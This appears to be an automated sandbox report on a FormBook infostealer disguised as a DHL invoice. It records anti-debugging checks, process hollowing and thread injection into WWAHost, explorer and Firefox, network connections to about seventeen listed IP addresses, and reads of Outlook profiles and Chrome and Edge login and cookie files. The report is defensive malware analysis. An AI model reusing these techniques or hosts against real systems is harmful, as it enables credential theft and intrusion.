Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81DE50 mov ecx, dword ptr fs:[00000030h]	3_2_1D81DE50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81DE50 mov eax, dword ptr fs:[00000030h]	3_2_1D81DE50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81DE50 mov eax, dword ptr fs:[00000030h]	3_2_1D81DE50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCEA0 mov eax, dword ptr fs:[00000030h]	3_2_1D7DCEA0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874E62 mov eax, dword ptr fs:[00000030h]	3_2_1D874E62
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D mov eax, dword ptr fs:[00000030h]	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAE89 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAE89
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAE89 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAE89
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CBE80 mov eax, dword ptr fs:[00000030h]	3_2_1D7CBE80
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85EE78 mov eax, dword ptr fs:[00000030h]	3_2_1D85EE78
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6970 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6970
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B096B mov eax, dword ptr fs:[00000030h]	3_2_1D7B096B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B096B mov eax, dword ptr fs:[00000030h]	3_2_1D7B096B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8289A0 mov eax, dword ptr fs:[00000030h]	3_2_1D8289A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC958 mov eax, dword ptr fs:[00000030h]	3_2_1D7DC958
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82F9AA mov eax, dword ptr fs:[00000030h]	3_2_1D82F9AA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82F9AA mov eax, dword ptr fs:[00000030h]	3_2_1D82F9AA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C4955 mov eax, dword ptr fs:[00000030h]	3_2_1D7C4955
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C4955 mov eax, dword ptr fs:[00000030h]	3_2_1D7C4955
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov ecx, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB950 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB950
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CE94E mov eax, dword ptr fs:[00000030h]	3_2_1D7CE94E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8369B0 mov eax, dword ptr fs:[00000030h]	3_2_1D8369B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8369B0 mov eax, dword ptr fs:[00000030h]	3_2_1D8369B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8369B0 mov ecx, dword ptr fs:[00000030h]	3_2_1D8369B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC944 mov eax, dword ptr fs:[00000030h]	3_2_1D7DC944
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CD940 mov eax, dword ptr fs:[00000030h]	3_2_1D7CD940
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CD940 mov eax, dword ptr fs:[00000030h]	3_2_1D7CD940
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85D9C6 mov eax, dword ptr fs:[00000030h]	3_2_1D85D9C6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C9938 mov ecx, dword ptr fs:[00000030h]	3_2_1D7C9938
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82D9C7 mov eax, dword ptr fs:[00000030h]	3_2_1D82D9C7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F693A mov eax, dword ptr fs:[00000030h]	3_2_1D7F693A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F693A mov eax, dword ptr fs:[00000030h]	3_2_1D7F693A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F693A mov eax, dword ptr fs:[00000030h]	3_2_1D7F693A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79B931 mov eax, dword ptr fs:[00000030h]	3_2_1D79B931
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79B931 mov eax, dword ptr fs:[00000030h]	3_2_1D79B931
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8729CF mov eax, dword ptr fs:[00000030h]	3_2_1D8729CF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8729CF mov eax, dword ptr fs:[00000030h]	3_2_1D8729CF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8499D6 mov ecx, dword ptr fs:[00000030h]	3_2_1D8499D6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D5921 mov eax, dword ptr fs:[00000030h]	3_2_1D7D5921
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D5921 mov ecx, dword ptr fs:[00000030h]	3_2_1D7D5921
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D5921 mov eax, dword ptr fs:[00000030h]	3_2_1D7D5921
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D5921 mov eax, dword ptr fs:[00000030h]	3_2_1D7D5921
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2919 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2919
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2919 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2919
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F6912 mov eax, dword ptr fs:[00000030h]	3_2_1D7F6912
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797917 mov eax, dword ptr fs:[00000030h]	3_2_1D797917
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CB9FA mov eax, dword ptr fs:[00000030h]	3_2_1D7CB9FA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7999F0 mov ecx, dword ptr fs:[00000030h]	3_2_1D7999F0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A09F0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A09F0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D49F0 mov eax, dword ptr fs:[00000030h]	3_2_1D7D49F0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D49F0 mov eax, dword ptr fs:[00000030h]	3_2_1D7D49F0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86892E mov eax, dword ptr fs:[00000030h]	3_2_1D86892E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86892E mov eax, dword ptr fs:[00000030h]	3_2_1D86892E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D87492D mov eax, dword ptr fs:[00000030h]	3_2_1D87492D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CD9CE mov eax, dword ptr fs:[00000030h]	3_2_1D7CD9CE
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835930 mov eax, dword ptr fs:[00000030h]	3_2_1D835930
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835930 mov eax, dword ptr fs:[00000030h]	3_2_1D835930
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835930 mov eax, dword ptr fs:[00000030h]	3_2_1D835930
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835930 mov ecx, dword ptr fs:[00000030h]	3_2_1D835930
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB9C0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB9C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AB9C0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AB9C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A89C0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A89C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A89C0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A89C0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86D946 mov eax, dword ptr fs:[00000030h]	3_2_1D86D946
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85D947 mov eax, dword ptr fs:[00000030h]	3_2_1D85D947
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79B9B0 mov eax, dword ptr fs:[00000030h]	3_2_1D79B9B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D89B0 mov edx, dword ptr fs:[00000030h]	3_2_1D7D89B0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82395B mov eax, dword ptr fs:[00000030h]	3_2_1D82395B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82395B mov eax, dword ptr fs:[00000030h]	3_2_1D82395B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82395B mov eax, dword ptr fs:[00000030h]	3_2_1D82395B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AE9A0 mov eax, dword ptr fs:[00000030h]	3_2_1D7AE9A0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC98F mov eax, dword ptr fs:[00000030h]	3_2_1D7DC98F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC98F mov eax, dword ptr fs:[00000030h]	3_2_1D7DC98F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC98F mov eax, dword ptr fs:[00000030h]	3_2_1D7DC98F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AF870 mov eax, dword ptr fs:[00000030h]	3_2_1D7AF870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AF870 mov eax, dword ptr fs:[00000030h]	3_2_1D7AF870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B9870 mov eax, dword ptr fs:[00000030h]	3_2_1D7B9870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B9870 mov eax, dword ptr fs:[00000030h]	3_2_1D7B9870
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D841889 mov eax, dword ptr fs:[00000030h]	3_2_1D841889
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D841889 mov eax, dword ptr fs:[00000030h]	3_2_1D841889
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D841889 mov eax, dword ptr fs:[00000030h]	3_2_1D841889
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82488F mov eax, dword ptr fs:[00000030h]	3_2_1D82488F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82B890 mov eax, dword ptr fs:[00000030h]	3_2_1D82B890
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82B890 mov eax, dword ptr fs:[00000030h]	3_2_1D82B890
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82B890 mov ecx, dword ptr fs:[00000030h]	3_2_1D82B890
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D858890 mov eax, dword ptr fs:[00000030h]	3_2_1D858890
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D858890 mov eax, dword ptr fs:[00000030h]	3_2_1D858890
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8298B2 mov eax, dword ptr fs:[00000030h]	3_2_1D8298B2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CB839 mov eax, dword ptr fs:[00000030h]	3_2_1D7CB839
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8618DA mov eax, dword ptr fs:[00000030h]	3_2_1D8618DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8618DA mov eax, dword ptr fs:[00000030h]	3_2_1D8618DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8618DA mov eax, dword ptr fs:[00000030h]	3_2_1D8618DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8618DA mov eax, dword ptr fs:[00000030h]	3_2_1D8618DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79D818 mov eax, dword ptr fs:[00000030h]	3_2_1D79D818
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC819 mov eax, dword ptr fs:[00000030h]	3_2_1D7DC819
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DC819 mov eax, dword ptr fs:[00000030h]	3_2_1D7DC819
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D8388FB mov eax, dword ptr fs:[00000030h]	3_2_1D8388FB

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_03291F89 LdrLoadDll,

1_2_03291F89

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.140.149.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.91.236.193 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 207.60.131.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.238.95 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.105.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.221.20.121 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.214.80.106 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.64.242.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 89.31.143.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.20.200.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.217.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.40.34.41 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 950000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Section loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WWAHost.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6E44F0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WWAHost.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6E44F0000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Thread register set: target process: 7188			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 4672			Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process created: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe C:\Users\user\Desktop\DHL-INVOICE-MBV.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe			Jump to behavior

Source: RAVCpl64.exe, 00000004.00000002.22563860154.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18073012312.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18064517171.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000004.00000002.22563860154.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18073012312.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18064517171.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RAVCpl64.exe, 00000004.00000002.22563860154.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18073012312.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18064517171.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: PProgram Manager
Source: explorer.exe, 0000000A.00000000.18435878166.000000000C976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18375180058.000000000C976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18498559940.000000000C976000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndTE.#
Source: RAVCpl64.exe, 00000004.00000002.22563860154.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18073012312.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.18064517171.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.18408516765.0000000000758000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18470711118.0000000000758000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18213351975.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progmanu3

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

1_2_00403359

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\WWAHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WWAHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
